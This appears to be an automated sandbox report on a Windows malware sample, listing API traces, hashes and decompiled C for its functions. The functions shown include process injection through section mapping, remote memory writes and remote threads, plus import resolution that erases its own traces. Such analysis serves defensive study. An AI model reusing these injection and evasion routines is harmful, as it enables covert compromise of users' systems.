Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

